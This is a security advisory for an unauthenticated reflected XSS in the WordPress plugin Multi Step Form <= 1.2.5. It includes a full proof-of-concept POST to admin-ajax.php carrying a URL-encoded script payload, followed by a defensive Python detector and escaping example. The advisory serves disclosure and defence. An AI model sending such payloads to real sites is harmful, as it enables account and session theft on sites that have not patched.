wpexploit | Javier Olmedo | WPEX-ID: 09BEA732-3A70-4B0A-9BDD-88501A893629
History: Jul 20, 2018 - 12:00 a.m.

Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS

2018-07-20 00:00:00
Javier Olmedo

EPSS: 0.001 (Low)
Percentile: 41.6%

The WordPress plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through reflected XSS. The issue can be exploited by unauthenticated attackers, for example via CSRF.

The following parameters are vulnerable in the fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
 
Proof of Concept (PoC):
The following POST request causes an alert to be displayed in the browser when the response is rendered:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0
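As an added example (not part of the original advisory or of the plugin's code), the following Python script parses the PoC body above, flags the fw_data/email parameters that carry HTML markup, and applies the output escaping whose absence causes the issue. The markup regex, the BENIGN_BODY sample and the function names are constructed here for illustration; the plugin's own handler is not on the page.

```python
from __future__ import annotations

import html
import re
from urllib.parse import parse_qsl

# Constructed sample: the POST body from the PoC above, embedded so the
# detection runs offline.
POC_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    "&fw_data%5BTest%5D%5B1%5D%5B%5D=2"
    "&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com"
    "&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20"
    "&email=3%403.com&nonce=ba16aeb8b0"
)

# Constructed sample: a benign submission of the same form, for comparison.
BENIGN_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=Alice"
    "&fw_data%5BTest%5D%5B1%5D%5B%5D=2"
    "&fw_data%5BTest%5D%5B2%5D%5B%5D=alice%40example.com"
    "&email=alice%40example.com&nonce=ba16aeb8b0"
)

# Parameters the advisory lists as reflected without escaping: anything
# under fw_data[...] plus the top-level email field.
REFLECTED_PREFIXES = ("fw_data[", "email")

# Markup that has no business in a name, e-mail or date field. A tag opener
# or an inline event handler is enough to flag the request for review; this
# is a triage signal, not a full HTML parser (assumption: tune to your forms).
HTML_MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z]|on[a-z]+\s*=", re.IGNORECASE)


def parse_body(body: str) -> list[tuple[str, str]]:
    """Decode an application/x-www-form-urlencoded body into (name, value)
    pairs. parse_qsl keeps duplicate names and decodes %5B/%5D back to [ ]."""
    return parse_qsl(body, keep_blank_values=True)


def is_fw_send_email(body: str) -> bool:
    """True when the request targets the AJAX action shown in the PoC."""
    return dict(parse_body(body)).get("action") == "fw_send_email"


def find_reflected_markup(body: str) -> list[tuple[str, str]]:
    """Return the (parameter, value) pairs that hit the reflected fields and
    carry HTML markup, i.e. the ones worth alerting on."""
    hits = []
    for name, value in parse_body(body):
        if name.startswith(REFLECTED_PREFIXES) and HTML_MARKUP.search(value):
            hits.append((name, value))
    return hits


def escape_for_reflection(value: str) -> str:
    """The missing mitigation: HTML-encode the value before echoing it into
    the response, so the payload renders as text instead of executing."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        if not is_fw_send_email(body):
            continue
        for name, value in find_reflected_markup(body):
            print(f"suspicious {name}: {value!r}")
            print(f"  escaped output would be: {escape_for_reflection(value)!r}")
```

Run against the PoC body, find_reflected_markup reports only the fw_data[Test][0][] field; the benign body produces no hits, and the escaped value no longer matches the markup pattern. The same two functions can be fed the decoded request bodies from a WAF or access log to spot attempts against this endpoint.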
